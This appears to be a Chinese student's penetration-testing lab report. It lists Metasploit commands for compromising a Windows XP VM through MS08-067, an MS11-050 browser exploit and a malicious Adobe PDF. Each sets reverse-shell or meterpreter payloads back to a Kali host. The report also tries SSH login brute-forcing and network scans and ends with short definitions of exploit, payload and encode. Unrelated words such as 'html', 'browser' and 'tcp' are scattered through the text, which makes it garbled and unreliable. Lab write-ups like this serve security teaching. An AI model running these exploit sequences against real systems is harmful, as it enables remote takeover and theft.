查找關於ms08_067的滲透模塊
html
exploit/windows/smb/ms08_067_netapi
顯示攻擊載荷,能夠用這個shell_bind_tcp
shell
show targets
看一下能夠被攻擊的靶機的操做系統set payload generic/shell_reverse_tcp
設置攻擊有效載荷。查看當前設置,要將RHOST設置爲XP的IP;將LHOST設爲kali的IP
set LHOST "kali Ip" set RHOST "Win xp Ip"
windows
以後exploit
能夠獲取其shellapi
回到ms08_067_netapi模塊界面瀏覽器
set payload windows/meterpreter/reverse_tcp
use windows/browser/ms11_050_mshtml_cobjectelement
可查看信息info
以及目標瀏覽器targets
安全
set payload windows/meterpreter/reverse_tcp
show options
(將LHOST設爲kali的IP、set LPORT xxx set URIPATH xxx)
網絡
完成exploit
XP訪問底下的網址
session
此時kali中session已建立
ssh
使用命令sessions -i 1
開始鏈接,併成功獲得shell
tcp
實驗步驟:
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
show options
set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx
設置相關信息
生成其pdf,將pdf拷貝到靶機中
使用命令exploit開始攻擊,在xp中打開pdf。
此時kali中能夠看見
已成功奪權
看看靶機裏的tcp鏈接
使用show auxiliary
查看輔助模塊
我首先選擇了這個漏洞,百度以後是進行遠程ssl帳號口令的破解。
首先使用use auxiliary/scanner/ssh/ssh_login
查看其配置信息(還配置了pass.txt,和user.txt)
可是run以後一直出錯
(百度說Windows下msf安裝好之後,直接把生成好的pass.txt和user.txt放到X:\Program Files\Metasploit\Framework3\msf3\目錄下,直接放到c:\下面不行 只能放到msf3目錄下,我覺得直接把生成的文件拷貝過去就行,首先我沒找到生成的文件...而後我把ip改成kali的,仍是報錯)
仍是看一下scanner/http/ssl
咱們更改了目標主機設爲同一網段的,再次掃描...未果
又更改了其線程...仍未果
仍是作最容易的nmap掃面,看看其開放端口吧
仍是不太甘心,又作了一下arp_sweep
填好其設置信息之後使用run 開始掃描。可看到鏈接狀況。
(1)用本身的話解釋什麼是exploit,payload,encode.
exploit
:就是發起滲透攻擊,當你能夠得到靶機shell或者作一些奪權的準備以後的最後一個run。payload
就是咱們在作滲透攻擊中用到的shellcode,能夠破壞程序正常運行的代碼。encode
假裝病毒的一種手段——編碼經過本次實驗,我首先掌握了經過msf如何查看各類各樣的安全漏洞,再經過一個漏洞的分類進行攻擊。大體步驟爲:
show auxiliary
search xxx
(能夠看到分別表示的模塊類型、目標平臺、目標服務、模塊名字)show payloads
可查看攻擊載荷的類型,選擇運行後門show options
查看配設滲透攻擊所須要的配置選項。yes
爲必須配設的經過set xxx xxxx
來配設show targets
來看看相應的受害者是啥show options
確認一下exploit
發起進攻。本次實驗難度方面不是特別大,主要考察你虛擬機能不能行,哎,一直在百分之93的狀態下作完了實驗,最後也分不清0 8 和o 了。。。